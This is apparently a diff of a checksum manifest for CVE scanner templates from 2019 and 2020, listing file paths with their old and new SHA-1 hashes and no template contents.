+http/cves/2019/CVE-2019-20141.yaml:a35d73a26d4304223e7f62e87791e663a12e069a http/cves/2019/CVE-2019-20183.yaml:09eb91b7f52447d8655a37ed4bbe95300e7378bf -http/cves/2019/CVE-2019-20210.yaml:33c5ab4fb84e026a52a44b982f8a3c68753ac9d4 -http/cves/2019/CVE-2019-20224.yaml:63c371fdb3627b07c5ca57bc82234ce2fd73dbf1 -http/cves/2019/CVE-2019-20933.yaml:b4ff75ea2a14351ba4455cc2049a5367d33bb5f6 +http/cves/2019/CVE-2019-20210.yaml:423485155c1d5ad2f94ce866e2a2d9738d7eb701 +http/cves/2019/CVE-2019-20224.yaml:d4627b2f43c8bd7e4417435f435f678196e8ea83 +http/cves/2019/CVE-2019-20933.yaml:2dcc2b52e8b1e6037cab9f8c91a66d03ddf27cb6 http/cves/2019/CVE-2019-2578.yaml:a0704f60e75947e62e565cb45595a84b731dd81b http/cves/2019/CVE-2019-2579.yaml:f7deec158d506da6c216c93f0375f5a927317da4 http/cves/2019/CVE-2019-2588.yaml:c7f798622689a44bf38e9c96710add9c5bdcc5cd -http/cves/2019/CVE-2019-2616.yaml:3fe8eb3189261123c345704ad4e82e0cd5a6ecb4 +http/cves/2019/CVE-2019-2616.yaml:49771e4c9de01bd8e36ce88a50a5d707dda27c66 http/cves/2019/CVE-2019-2725.yaml:c0b1c9de5b114881547faa1ecb3a9dfe55f3af0c -http/cves/2019/CVE-2019-2729.yaml:34fe986223062b08b38a8a1da72390f96d7e35d8 +http/cves/2019/CVE-2019-2729.yaml:222af28a1803c75b198281d8150ae8e6eeb863e9 http/cves/2019/CVE-2019-2767.yaml:9c9628b7dead68845570d0883068ad29cec11c69 http/cves/2019/CVE-2019-3396.yaml:24a87a48a55562a9f9284f20e9b59b12a0e52727 -http/cves/2019/CVE-2019-3398.yaml:359883860ff50c8282893320e98877cf4f201bf8 +http/cves/2019/CVE-2019-3398.yaml:0f781eea698b5305dc59e8e6c441a04510225a91 http/cves/2019/CVE-2019-3401.yaml:e919f1305ffa5044b5eac5e37d80178d8413aadf http/cves/2019/CVE-2019-3402.yaml:e875780f5316e2e685f55c79921cdcb90390396b -http/cves/2019/CVE-2019-3403.yaml:cb860e2d12ba9f84068252624d4fa9c20a25ea55 -http/cves/2019/CVE-2019-3799.yaml:7ca01e8bc838b8f14b8ff2c3a7856d8ab4aa6db7 -http/cves/2019/CVE-2019-3911.yaml:60bad0968b361ad7400cbf147b011d9bd62f48a9 -http/cves/2019/CVE-2019-3912.yaml:fd327d636ba1fe5c3fdd1d923b23f4a3aa4b7842 -http/cves/2019/CVE-2019-3929.yaml:2a461f92bd310f46ab1c2cc3d4da0f237134675c -http/cves/2019/CVE-2019-5127.yaml:a8573a60af8fc2961f11b134e4b18dfb1e5643b6 -http/cves/2019/CVE-2019-5418.yaml:45c69bfdef5871a86b8ae2af518cbfaba298464c -http/cves/2019/CVE-2019-5434.yaml:ed7547e7f4361fb86514077654e2f3a0b8f1e9f4 -http/cves/2019/CVE-2019-6112.yaml:f7ddfaa256066a26aaedb8da74037292814708a5 -http/cves/2019/CVE-2019-6340.yaml:c5c4688ced3332dbb8ed7d9ce2ce28c67527c15d -http/cves/2019/CVE-2019-6715.yaml:cf0c3c5bb1820844c1046ee082bcf9f94675da40 -http/cves/2019/CVE-2019-6799.yaml:f6c533ec6b153c1c5da9f42082b8497c8d9138dd -http/cves/2019/CVE-2019-6802.yaml:df7d1b0093b3e31a4b7a40b4bfcbc06ddac09672 +http/cves/2019/CVE-2019-3403.yaml:2e3792d689965282d2c111d88a73504d7dce6e2d +http/cves/2019/CVE-2019-3799.yaml:b50992af94bf8f2b667b253029d6e978c184686a +http/cves/2019/CVE-2019-3911.yaml:817157aaf7e4b3ecc9c7ad6203707d49e0d05544 +http/cves/2019/CVE-2019-3912.yaml:05816b1655912464da0072b87cdfe90eee7b0719 +http/cves/2019/CVE-2019-3929.yaml:9de8f3f7312bd0b5525ba41b71ddffeb6dc193bf +http/cves/2019/CVE-2019-5127.yaml:a18cf67b04c44e210d6fc33343dd77820fc1555b +http/cves/2019/CVE-2019-5418.yaml:69a34f868bdea612ab7691eab3543566947699b9 +http/cves/2019/CVE-2019-5434.yaml:4c1da5f6a66c7c48bab3d57a5b7f0edc6a7ed024 +http/cves/2019/CVE-2019-6112.yaml:d009c3b8cc6cdb705307890c9ec89513170694d8 +http/cves/2019/CVE-2019-6340.yaml:86e83cd0f886a50667fb3cfc64d5537c48140ce9 +http/cves/2019/CVE-2019-6715.yaml:1462b82ac15f5475e25a1c70be0638512af43b0e +http/cves/2019/CVE-2019-6799.yaml:f6e232fc8162233e387fd6b8feb6343a3d4a4bc1 +http/cves/2019/CVE-2019-6802.yaml:8e97b2928034c605cf63ea06495bd7323b1b4b4b http/cves/2019/CVE-2019-7139.yaml:9ce4e6a9da54dabf3d98d063111cc7e8d337fef7 -http/cves/2019/CVE-2019-7192.yaml:a3c022f3f5f609a34f4fff7c8584b27bbe280088 -http/cves/2019/CVE-2019-7219.yaml:22b58ee1a923ac844ea0def093b470e6271be400 -http/cves/2019/CVE-2019-7238.yaml:95354fb6a82023096eb5605d4c31f822955e5898 -http/cves/2019/CVE-2019-7254.yaml:58d2705cf5a3522943dc404d0605c0344f6e0ceb -http/cves/2019/CVE-2019-7255.yaml:15cd8a68db1d99991d667d66a6bc422d3e6aeca0 -http/cves/2019/CVE-2019-7256.yaml:3ac6d980c716565de1ef79f4d9bb3b4a9e387740 +http/cves/2019/CVE-2019-7192.yaml:4b711f4f722e162132785380aa6ec24148834ec6 +http/cves/2019/CVE-2019-7219.yaml:066161828bddf3fad9c338d9ab9f902431f9ad00 +http/cves/2019/CVE-2019-7238.yaml:6fb130fbe23c11eba5b3ce1985fde0165f3914ca +http/cves/2019/CVE-2019-7254.yaml:ad24fea4ae2fba5b3c90618326513bdb5dfbedde +http/cves/2019/CVE-2019-7255.yaml:7d5d2e3b98102930733a586a1d1ec088282a2f6f +http/cves/2019/CVE-2019-7256.yaml:9b36f3e017eda1de90ee67a0baee734e31ca1fdb http/cves/2019/CVE-2019-7275.yaml:d251cbfb5bcd0cef05eae4ca47c159d2b03ce132 -http/cves/2019/CVE-2019-7315.yaml:563d393bc73e5b333d833a2246ea88618f7dc974 +http/cves/2019/CVE-2019-7315.yaml:aef603a42e387838d30064359e8f376292d8c488 http/cves/2019/CVE-2019-7481.yaml:7e3ebd3190512ff8d2949cb3522a11884b3e75c4 http/cves/2019/CVE-2019-7543.yaml:03e4e0a5e50bfb20f17e3b446c41035f56d6351a -http/cves/2019/CVE-2019-7609.yaml:6e6f132b4bfff1ae086c14c0e841c0f0d85b119e -http/cves/2019/CVE-2019-8086.yaml:52e596338a09e62826e3ee5b50068eb2775a858b -http/cves/2019/CVE-2019-8390.yaml:d3553e9ed80efd29280fae1a715cbcffc9530e09 -http/cves/2019/CVE-2019-8442.yaml:04a79ea9dfd14ec3a51f817ba469eefec9d6e506 -http/cves/2019/CVE-2019-8446.yaml:8c8d7da037e6deaaaba5ed387258e7bfa4fd6bbc -http/cves/2019/CVE-2019-8449.yaml:28d6468489990a531504fe946cd565726f84b734 +http/cves/2019/CVE-2019-7609.yaml:429a7deb4d729e22c14cd66db90f7cbad01564f0 +http/cves/2019/CVE-2019-8086.yaml:6e201e44c80550e4981fc22cfaee801272cfe385 +http/cves/2019/CVE-2019-8390.yaml:b18016f9d895afdb0c2dc81ff8ac484b845f0caf +http/cves/2019/CVE-2019-8442.yaml:b145c1968834d349dd2e15e465f121fc34f686ea +http/cves/2019/CVE-2019-8446.yaml:1762b98d29b72640f5ceac6c8b71d157d54904b3 +http/cves/2019/CVE-2019-8449.yaml:62a9df63a8563c26c81bc4978531c3cc168cb9fd http/cves/2019/CVE-2019-8451.yaml:814f3f055c890bf9f2018767b4db70a623fb351c http/cves/2019/CVE-2019-8903.yaml:187c434537693e85a8ff134a9c6ce0fd2912ebae -http/cves/2019/CVE-2019-8937.yaml:9b9106c252c15d8df2fa8ebd0ae0f1ab36cb4bfb -http/cves/2019/CVE-2019-8982.yaml:e0d303e9104eb25c01b2f53d8bdef398a464cc40 +http/cves/2019/CVE-2019-8937.yaml:66e792ae741558c01f8137916f06d27e7262cfe9 +http/cves/2019/CVE-2019-8982.yaml:d345b49353e77db87682e091eba0c1668e5a374f http/cves/2019/CVE-2019-9041.yaml:1acd718661ba2a770f36087b628c659c058bf16c -http/cves/2019/CVE-2019-9618.yaml:bd20454a1919dd4b65ae2ff8c539ef0781605acf -http/cves/2019/CVE-2019-9632.yaml:a9b4273d963d3b99382bc05bb819a3f47bfa2b81 -http/cves/2019/CVE-2019-9670.yaml:8750d6eed79a4854dddbf7228f6e33488588d8d6 -http/cves/2019/CVE-2019-9726.yaml:22711bb0aaac4abb940352d002f34f101c1c831c -http/cves/2019/CVE-2019-9733.yaml:f98e32bd5d2c400b944115b429bb58a84f0cded3 -http/cves/2019/CVE-2019-9915.yaml:eb20be2c46939b6b57b4463f42bab1429f6a16b8 -http/cves/2019/CVE-2019-9922.yaml:f208a9a411ee06862f265c7a021195694b9806a6 +http/cves/2019/CVE-2019-9618.yaml:d1d4515fdd132e8704aa3ad89f97f9a3840d2503 +http/cves/2019/CVE-2019-9632.yaml:0274c217e1647f506915d7c84cdb5f792287060b +http/cves/2019/CVE-2019-9670.yaml:4c5ad92a6cda1072215f60d63717521d9b552b44 +http/cves/2019/CVE-2019-9726.yaml:dc39e85dbbe5056aae9925c7a68be4767ff3992c +http/cves/2019/CVE-2019-9733.yaml:2caf78cb597139c1a3db12a011f7f9ba6e94ac68 +http/cves/2019/CVE-2019-9915.yaml:939eceb6822e8651b5daaf3085bdcc1d35e434d6 +http/cves/2019/CVE-2019-9922.yaml:6c85785266eba7189ac1457d23b0473f33cf9440 http/cves/2019/CVE-2019-9955.yaml:aa1f5d5783764fa700842f5a8d7bec989d60f572 http/cves/2019/CVE-2019-9978.yaml:888dc6e81557675a2255e20d09d22c709863eede -http/cves/2020/CVE-2020-0618.yaml:800965770c9aea20da669fe5083b4c0b2cb34461 +http/cves/2020/CVE-2020-0618.yaml:ba66da0763579b0aea33e37bd6b9124cc35a7419 http/cves/2020/CVE-2020-10148.yaml:bbb610b4e3403659c5f171819c0cace86262e009 -http/cves/2020/CVE-2020-10199.yaml:77d72c4b9762cd1ca9e0e2b0dbafd457d6e89583 -http/cves/2020/CVE-2020-10220.yaml:4778e319ea29668de75ddd08d835c101dca6ce91 -http/cves/2020/CVE-2020-10546.yaml:f4cfaba39bd36ea06f7ad20f779c8b892b327f95 -http/cves/2020/CVE-2020-10547.yaml:fccf2c60ed0d31406920c7f1c696c8e7e4f8a9f2 -http/cves/2020/CVE-2020-10548.yaml:c729f31eda87929ce0ef96b5c4bd29d439828b95 -http/cves/2020/CVE-2020-10549.yaml:8d62ce9548305a000a29ee4de7cab6deb2b057f3 -http/cves/2020/CVE-2020-10770.yaml:e91c721865dd2ff31cecf4aa60d6b51bd9561a4b -http/cves/2020/CVE-2020-10973.yaml:201cab00b4e2ace6f44b87582e5837359bb6731b -http/cves/2020/CVE-2020-11034.yaml:e3c027ab23fdced89e9e73cf36bcf8d1cc3390a0 -http/cves/2020/CVE-2020-11110.yaml:44cb6133ad238cbe045ef5abc513fb02b16fb78f -http/cves/2020/CVE-2020-11450.yaml:8756a2949a6c8fb8745f7349dc63d5eae6e07774 +http/cves/2020/CVE-2020-10199.yaml:b93ee10549d24ac7a2207b525846b37e90c70ee4 +http/cves/2020/CVE-2020-10220.yaml:13edb444acc4430103a4f7f6a84f10602f89fe79 +http/cves/2020/CVE-2020-10546.yaml:4cbf1b7e152d7cffe84df5feef391dfcd46438dc +http/cves/2020/CVE-2020-10547.yaml:153c1b664b9491f7fcbc530feba3ba406b13deb0 +http/cves/2020/CVE-2020-10548.yaml:f37fec2174247354f9753fa6a2925047d2f69cc1 +http/cves/2020/CVE-2020-10549.yaml:7ff911d067ec6f0bde4ba6edfb5b609001870243 +http/cves/2020/CVE-2020-10770.yaml:ff35530145e876517077a4de00cb01f674d6c6b9 +http/cves/2020/CVE-2020-10973.yaml:72c3a72495f9675d3b99f4e5e6ca8f29d30fd265 +http/cves/2020/CVE-2020-11034.yaml:a825664c651e60f532af8d3c14610eea3f429d62 +http/cves/2020/CVE-2020-11110.yaml:fadc703ac41b35d8a1e87e554e36848674bdd6af +http/cves/2020/CVE-2020-11450.yaml:09220519d0db5db7c2a93fc06f80c6dae4f839ea http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 -http/cves/2020/CVE-2020-11530.yaml:c8b08da8627b2000000190853448b23f342fbc57 -http/cves/2020/CVE-2020-11546.yaml:d36c933c917a36874cbe0bea23837423a0d0f984 -http/cves/2020/CVE-2020-11547.yaml:0438a800f5346bc94895d8d3ca876529e7e5b752 -http/cves/2020/CVE-2020-11710.yaml:a8eebe94fca4681df48465ce78931cfb6a15da9e -http/cves/2020/CVE-2020-11738.yaml:38359263c5d1dd96d14cb4e5c55af4abfc62fa51 -http/cves/2020/CVE-2020-11798.yaml:4fac247c7e85074886b2222c70d627c7956f52fb -http/cves/2020/CVE-2020-11853.yaml:e9d6c43bb2ec253628b47ead334f90ec94c898aa -http/cves/2020/CVE-2020-11854.yaml:3aefc5b8da8bc0ab3112afec13a9d1461a928de1 -http/cves/2020/CVE-2020-11930.yaml:14ed550a2b4ebc2783eb0b9095e0ca792528315c -http/cves/2020/CVE-2020-11978.yaml:511466908b771f79db4fff1bbba8ca24f6c3d704 -http/cves/2020/CVE-2020-11991.yaml:222fe8cf6c5c7a92134acf23ce2562ff01105ad2 -http/cves/2020/CVE-2020-12054.yaml:f12b823b465f98af2f1aec6deed88b59fc412bfd -http/cves/2020/CVE-2020-12116.yaml:21d8e5468b29dfb8d2cfdb1c172f5f34c2232d2c -http/cves/2020/CVE-2020-12124.yaml:70eed1ed97b7fdc2924b9fdefc780f1b363fff97 -http/cves/2020/CVE-2020-12127.yaml:c6001a6c3877da5a3ae09e444a0b127e366637ba -http/cves/2020/CVE-2020-12256.yaml:f34659b59eaa2e1c504e59820b83c7563c536061 -http/cves/2020/CVE-2020-12259.yaml:73dda606f0fdc6c667fe8b2c22c27752240b2392 +http/cves/2020/CVE-2020-11530.yaml:80c9a47fde950d0a147cd5759e76fb36f9ddf865 +http/cves/2020/CVE-2020-11546.yaml:b2084708702133ce517eb71887809b459689f93a +http/cves/2020/CVE-2020-11547.yaml:b146bb73841f6b4ee326a5509431fbb9548396db +http/cves/2020/CVE-2020-11710.yaml:328459cf74b245b08f305b4da5b937778d78e9bd +http/cves/2020/CVE-2020-11738.yaml:26bc4a13b4dc75ef0ff4c86b0551736ad7ab0953 +http/cves/2020/CVE-2020-11798.yaml:754b954dee6c994a9f0aa84d27acb9cec98af47d +http/cves/2020/CVE-2020-11853.yaml:d688b8bf64d257892f84464396a6a1b56df47ddd +http/cves/2020/CVE-2020-11854.yaml:5b340b27bcee9e4e2a7bee5aa5e6849caabfbcdd +http/cves/2020/CVE-2020-11930.yaml:860f6680f4695f1feb7ab31de46449255ceece0a +http/cves/2020/CVE-2020-11978.yaml:6e72db28c07f184db4aee35e022988d897584841 +http/cves/2020/CVE-2020-11991.yaml:de4b0a2b5977855bfe63b173a4a4edb7e2e7316e +http/cves/2020/CVE-2020-12054.yaml:ccce337032ce9b12fe10efc5dcc4ca9b081e6ae9 +http/cves/2020/CVE-2020-12116.yaml:996d7d30601cb3ab87713f51cb15b93d59f28a74 +http/cves/2020/CVE-2020-12124.yaml:c60dc6e91d9b585c32fa85b3fa435122369080e9 +http/cves/2020/CVE-2020-12127.yaml:b60eab474bcfed827e783af39373f85fe9bb441f +http/cves/2020/CVE-2020-12256.yaml:939117d118c605aef9190c382e1aed61ece2af4e +http/cves/2020/CVE-2020-12259.yaml:fb372d0d4ec478378350cf8e844bbeac9e75b0cf http/cves/2020/CVE-2020-12447.yaml:25dca8fa73cb9a731e02a12b840d047144d60d13 -http/cves/2020/CVE-2020-12478.yaml:87e72cdc38005613a2284767f0a0225dc4cca51a -http/cves/2020/CVE-2020-12720.yaml:7b1db34fec447254d14245023e8a6c62d603d5e1 +http/cves/2020/CVE-2020-12478.yaml:6f8ebabd8a4a0df0eaaf7ebb99dbb706121d2418 +http/cves/2020/CVE-2020-12720.yaml:c7b69aea19ee132d50d7d92cd71b9bb38d56a390 http/cves/2020/CVE-2020-12800.yaml:571e8c8b17acd08b60d0b8f28a12c6589caa253c -http/cves/2020/CVE-2020-13117.yaml:20ee55cb74559402ad4b5e5570ba452ea96d7dec -http/cves/2020/CVE-2020-13121.yaml:4e31f4f3965162eec18f0f5458571a6ef4e17c70 -http/cves/2020/CVE-2020-13158.yaml:8eaf68c6e18b2f37e3020a1373b4da7a0e43b36b -http/cves/2020/CVE-2020-13167.yaml:0bcb46d26cc1d9722db0635eee7b834b101f4f60 -http/cves/2020/CVE-2020-13258.yaml:e65163f41e4d4f35947ca9a75d56fc81fc33c672 -http/cves/2020/CVE-2020-13379.yaml:de18bb72cb84abdaf69c7ae1920c351d916f8978 -http/cves/2020/CVE-2020-13405.yaml:2fbea436dc186fe32b0d2238dd9727fe8114df9d -http/cves/2020/CVE-2020-13483.yaml:d032793a83c1391bdd6c380c0b9884e0546ddc58 -http/cves/2020/CVE-2020-13638.yaml:be73c7ba116e9ffec0963f335231be77e1c17bd0 +http/cves/2020/CVE-2020-13117.yaml:115011fc3689582aab5176d3b93c0353c5f68a58 +http/cves/2020/CVE-2020-13121.yaml:93e5a3ab99c0ba9e334c2e082b4d38fb250b69ac +http/cves/2020/CVE-2020-13158.yaml:e519e5f44d47a168e7e54bd2a643040f87a12587 +http/cves/2020/CVE-2020-13167.yaml:ec08b3533526649fedf57311f268a9ffe02111c0 +http/cves/2020/CVE-2020-13258.yaml:4c4cb4659c8f357321d694522d65826a3acf4bd1 +http/cves/2020/CVE-2020-13379.yaml:39b1b8be9597f4b7462ed539822547363be526c3 +http/cves/2020/CVE-2020-13405.yaml:f1b58b0c636370023d623a044ba4d3efea0ace21 +http/cves/2020/CVE-2020-13483.yaml:32a74a6fa8b6e7d0be4e1dd3ba8e4ece9b9c8690 +http/cves/2020/CVE-2020-13638.yaml:6e6e5cd076e33bed8d1286c075b177ef15e0faf1 http/cves/2020/CVE-2020-13700.yaml:33340a13d53c725023e61b3a6a08233a924c9584 -http/cves/2020/CVE-2020-13820.yaml:f086d3a425e3df203ee9494f60298903e18b8908 -http/cves/2020/CVE-2020-13851.yaml:1c69b7e31eae6d20b1256497c1e1c54b258e25ea -http/cves/2020/CVE-2020-13927.yaml:95f52804c9dbb6945f9f695890e1463749e6dc84 -http/cves/2020/CVE-2020-13937.yaml:b900a130f56309cb0078d02a0d75ccfe5b748194 +http/cves/2020/CVE-2020-13820.yaml:11f946bd8460d570a9261e70c95e2d4926e26f20 +http/cves/2020/CVE-2020-13851.yaml:cd0d582d6ac0937cb331cc5ce7c672d8554dc097 +http/cves/2020/CVE-2020-13927.yaml:091aa2c66d885bf9cac55fc9df4015d6dd8ca3a0 +http/cves/2020/CVE-2020-13937.yaml:7384b1f6df654558f2d75603bda7d6645e672099 http/cves/2020/CVE-2020-13942.yaml:0b3b785fa8404e80153dc4a82d8a016e432b4d4e -http/cves/2020/CVE-2020-13945.yaml:00ce29da8821ba109bf480c70d67d6dcfc8faa5b +http/cves/2020/CVE-2020-13945.yaml:52eb28eaa2b449d7e0d7589e9c1a074379330d3c http/cves/2020/CVE-2020-14092.yaml:75a0892c9809a6c1abd7e4cc3d799a44cb88399d -http/cves/2020/CVE-2020-14144.yaml:de3bf41f10763111ab2ac8678715443f14755a1e -http/cves/2020/CVE-2020-14179.yaml:7c170559bfd46eb1f098ecd9433cb5962fe39d77 -http/cves/2020/CVE-2020-14181.yaml:a7670d91dac7816bc358f8c2bcb62a859b1aa8d3 -http/cves/2020/CVE-2020-14408.yaml:5ecf5a403a71a2a2ee721a0e9665bec2a4d0892d -http/cves/2020/CVE-2020-14413.yaml:1bd09b57c6c8840e671826d3d320fc072496823c -http/cves/2020/CVE-2020-14750.yaml:ef8663d1cfe855ac0400166121b550a2bb617309 -http/cves/2020/CVE-2020-14864.yaml:87bf1db7002cd028bbaceb5edc5e5388e676a2e9 -http/cves/2020/CVE-2020-14882.yaml:3aee0708f2ae7f6ee9d9d98036ef6600df3f93e1 -http/cves/2020/CVE-2020-14883.yaml:3e3d7b25a3bccd2e874fe539d1dcf5efdf13598f +http/cves/2020/CVE-2020-14144.yaml:71a68a2ba690ba91b57b5a841b65063acf027bf6 +http/cves/2020/CVE-2020-14179.yaml:02650cac88b4b63facf059a03d70b38a454a5f4e +http/cves/2020/CVE-2020-14181.yaml:c8c6b6dcfd2a9d5fa3e6d18f0f360d3b13e0a4f3 +http/cves/2020/CVE-2020-14408.yaml:38404424dc18ecb1567f9616b870eac945064f4f +http/cves/2020/CVE-2020-14413.yaml:bd2640f4d67b741a9ca405cacbafdb65d02d6a61 +http/cves/2020/CVE-2020-14750.yaml:f93fa338bc9aff0897db541ccfe290675a38d5a3 +http/cves/2020/CVE-2020-14864.yaml:02384242a01304c27bfc479d385b6a8b345e51e5 +http/cves/2020/CVE-2020-14882.yaml:1274cc4f172ee44d08fcaed8b0cb877b0ead846f +http/cves/2020/CVE-2020-14883.yaml:157377c7b25c726f3522c40bca02085f454b39c0 http/cves/2020/CVE-2020-15050.yaml:ff53982b1660dbacf0082093c19954ccd1597228 -http/cves/2020/CVE-2020-15129.yaml:c07785a9275455945fe8e675e5833c4ed124ec93 -http/cves/2020/CVE-2020-15148.yaml:e453aabff7dfda3a671b847d7b2648e2ab52ed3f -http/cves/2020/CVE-2020-15227.yaml:ed721a2d4c39a7b1231ca59f538153370217532e -http/cves/2020/CVE-2020-15500.yaml:b80e7228d9b90fc7824b871f8b16eb6c3ac6ec32 +http/cves/2020/CVE-2020-15129.yaml:fe1867b21cf9670f45b1adf0da114bb61e374bd4 +http/cves/2020/CVE-2020-15148.yaml:1818ce67c964234a5007c23b04a0bf8972c127b2 +http/cves/2020/CVE-2020-15227.yaml:3399ba0c6fff5fe804a1613132ead0c946fb0728 +http/cves/2020/CVE-2020-15500.yaml:75f7b62a818f3845bb533cfbb29cf78bdff68d95 http/cves/2020/CVE-2020-15505.yaml:e6a491c737cc161a2f84ccf4adebee81a745337b -http/cves/2020/CVE-2020-15568.yaml:203c9a51e859837c893bdfb5eba736406670420f -http/cves/2020/CVE-2020-15867.yaml:25c54a61eedf2580bbf2304c6ab3c3f6ba945654 -http/cves/2020/CVE-2020-15895.yaml:2e8edcabc2258180e398d26769c2a347d21a9e09 +http/cves/2020/CVE-2020-15568.yaml:0884dd4a2c77ae056269ca663d8253757fd049bb +http/cves/2020/CVE-2020-15867.yaml:2d45f24936bc47c49c09b9f7ff40ab464df08931 +http/cves/2020/CVE-2020-15895.yaml:38869acd8fa5e6b059565ad54e6fee143f41abb9 http/cves/2020/CVE-2020-15920.yaml:b9bce590c1d6a4a2950e930ec84e5bd343fd1cf1 -http/cves/2020/CVE-2020-16139.yaml:47491567138b40f513976c442a929d1a1d45e20b -http/cves/2020/CVE-2020-16846.yaml:ed64b05db25e3391086736114330fca043564cf7 -http/cves/2020/CVE-2020-16952.yaml:855ef66059d537f337c286915ff3ecef82724d73 -http/cves/2020/CVE-2020-17362.yaml:12e90856b34ac06db9d68a267c83442f8b36dc97 -http/cves/2020/CVE-2020-17453.yaml:54e710d28087b56a97932478496448fc392951bc -http/cves/2020/CVE-2020-17456.yaml:e4d357ff92d873d41376c7b79a1f518893df1e45 -http/cves/2020/CVE-2020-17463.yaml:29e89de402c5bf2755d1203ec543c8a4c6d5836d -http/cves/2020/CVE-2020-17496.yaml:f2c8075b728119cade8e9670db347e016d0ed081 -http/cves/2020/CVE-2020-17505.yaml:3fc856c405b9d3ce267495bdf84d6cf8450a8698 +http/cves/2020/CVE-2020-16139.yaml:d6f5ca556451807e2d514d69af0ec61298cf723d +http/cves/2020/CVE-2020-16846.yaml:56d1ad720f2676a700fe9fcbdd8621a5f3538796 +http/cves/2020/CVE-2020-16952.yaml:4ce0a0c082be805c3dd4822bd5214d0e4400e6ce +http/cves/2020/CVE-2020-17362.yaml:73c86a5a4a59e4f50fa8943fc437acfef4d14c78 +http/cves/2020/CVE-2020-17453.yaml:09430bfffaa517528900fefef8ab4890595a7c6c +http/cves/2020/CVE-2020-17456.yaml:36bc3b3b798495d74160cedf8747faf400c93ad1 +http/cves/2020/CVE-2020-17463.yaml:9f44d84da08522dba61582a66775eafae5f8c65e +http/cves/2020/CVE-2020-17496.yaml:10f0b2f5ddd4b1e70c2be7e8a9b3e117e4b69ee7 +http/cves/2020/CVE-2020-17505.yaml:98f54ae7112117d8e7d0c1513d751e16279e93a5 http/cves/2020/CVE-2020-17506.yaml:2f42db756532bb7ed6eccaa22dc4196fb4e41c4a http/cves/2020/CVE-2020-17518.yaml:d81d48cbbd5df9824834f232c4c3ee0ecbe19d6f -http/cves/2020/CVE-2020-17519.yaml:28253c1983a82cee042980cfd0bef149fabf7ed6 -http/cves/2020/CVE-2020-17526.yaml:4ba2549b99a0073f587f3ac9420153e7ecedf330 -http/cves/2020/CVE-2020-17530.yaml:0824e5803fd53b497a41a4ee6a5dbfdc19eaea83 -http/cves/2020/CVE-2020-18268.yaml:cca1efded5674d028862ae277702b184c2fc5686 -http/cves/2020/CVE-2020-19282.yaml:70979b7fd446e0900faa2e234ecb470753dfd262 -http/cves/2020/CVE-2020-19283.yaml:1e5211578ecb8ecc871c90a65975e7b45d7f9758 +http/cves/2020/CVE-2020-17519.yaml:8b707e9dceb3975811ea8078b618c9e5d26819e7 +http/cves/2020/CVE-2020-17526.yaml:5266ff4a738dc93c9723af9e13d42a9178387ef7 +http/cves/2020/CVE-2020-17530.yaml:dca2405f9cd4e46c7ef764be6e4f7c8a3a81bb8b +http/cves/2020/CVE-2020-18268.yaml:6fd016f916dccfaa0d8a8ba365b143966bab3b49 +http/cves/2020/CVE-2020-19282.yaml:d7d60fd2197a68c7de77f8bbf6f166bdc977124b +http/cves/2020/CVE-2020-19283.yaml:23c95bd3067b4da3a55e3410e3658758b7aa4fd9 http/cves/2020/CVE-2020-19295.yaml:60d3dd84486b18da0358042732bec6e88c6cc771 -http/cves/2020/CVE-2020-19360.yaml:f54f5ab5917adf0baba0eea9ffb25ae6ab7a2dbe -http/cves/2020/CVE-2020-1943.yaml:832060129d1f3c91a51f41a15d7f1943944641eb -http/cves/2020/CVE-2020-19515.yaml:c74e6d116ade83c782a813e739811e563ff39756 -http/cves/2020/CVE-2020-1956.yaml:e208ea1467b8d468e37bfcfb9911a1f965cd7572 +http/cves/2020/CVE-2020-19360.yaml:9886ca3068574343a897d86700121d2f07afc83d +http/cves/2020/CVE-2020-1943.yaml:4b0f1287b33da1578b3f6e95a602925dfa15c05f +http/cves/2020/CVE-2020-19515.yaml:b59aebca0899304e6542d3c0bf42356d86a38d46 +http/cves/2020/CVE-2020-1956.yaml:e39efd627a666be39c486b9aeeaa316d2795d820 http/cves/2020/CVE-2020-19625.yaml:c838f4924ba3563572ed00d81634424490d317b4 -http/cves/2020/CVE-2020-20285.yaml:97c2daa0903995155b3c319d2cedeec2477bb5b8 -http/cves/2020/CVE-2020-20300.yaml:9695e60a614334c018bc667dc010c9f01ca59913 -http/cves/2020/CVE-2020-2036.yaml:2df878088d96ad05fcdee31970fc4aa430666c88 -http/cves/2020/CVE-2020-2096.yaml:604550a7f7977ee5e1980ab807019da472433fa2 -http/cves/2020/CVE-2020-20982.yaml:8bd093282b67d342b92002a85e671108b46a2608 +http/cves/2020/CVE-2020-20285.yaml:e6ca53b6da7cd8dd11006df026e5fc078a0aa084 +http/cves/2020/CVE-2020-20300.yaml:3364cc2abdd56679c558378f729b5e1f602b557b +http/cves/2020/CVE-2020-2036.yaml:5aa5c433b3ca32d9b8ce53aba859d520db030498 +http/cves/2020/CVE-2020-2096.yaml:aaa5c06f47b830ac7c52a31212f767151e078a05 +http/cves/2020/CVE-2020-20982.yaml:538d3beb3a9976144b2a6a10e8fa30af220dd0d4 http/cves/2020/CVE-2020-20988.yaml:639c85d1714dbddbfd9e4b8db0fbce4a5ac90b54 -http/cves/2020/CVE-2020-21012.yaml:eb38856f0cd1394e96a25ad58747944fc74e9d06 -http/cves/2020/CVE-2020-2103.yaml:b4b23de5027241fffef5e5c9699760de8ded2d45 +http/cves/2020/CVE-2020-21012.yaml:03a5be731cfd6bf8b8e6d82c5ee1aded97e6e695 +http/cves/2020/CVE-2020-2103.yaml:6340b06f77e921e1b4c2fcf58c6f7119fec5faee http/cves/2020/CVE-2020-21224.yaml:9215850ea5836ba8924a9492ebfdd2f6a56e0ecb -http/cves/2020/CVE-2020-2140.yaml:a64a2b9363ac7e1dad3fe84be28242a52d49d610 -http/cves/2020/CVE-2020-22208.yaml:18bc41bafd7e5cf4fd8298da2627cce27ec09a33 -http/cves/2020/CVE-2020-22209.yaml:253697c3e817bc5f4fb695cf2e14319bfa55358b -http/cves/2020/CVE-2020-22210.yaml:7da9ba29c3ea1f1fc49d299c58d706588985ec7b -http/cves/2020/CVE-2020-22211.yaml:23709d74423456f7096fa167921c7470d6b27613 +http/cves/2020/CVE-2020-2140.yaml:278c2662d3e3830d9336cb5c74086e11b5e9c97e +http/cves/2020/CVE-2020-22208.yaml:2e9b83fc8a0ee7227ee868b6df9ccb784c640d7f +http/cves/2020/CVE-2020-22209.yaml:a0db814438b2e60b811804f05fd222ad59ae0c65 +http/cves/2020/CVE-2020-22210.yaml:3b5e8ebc6acfc8fa158efffc8f06523b00d952c3 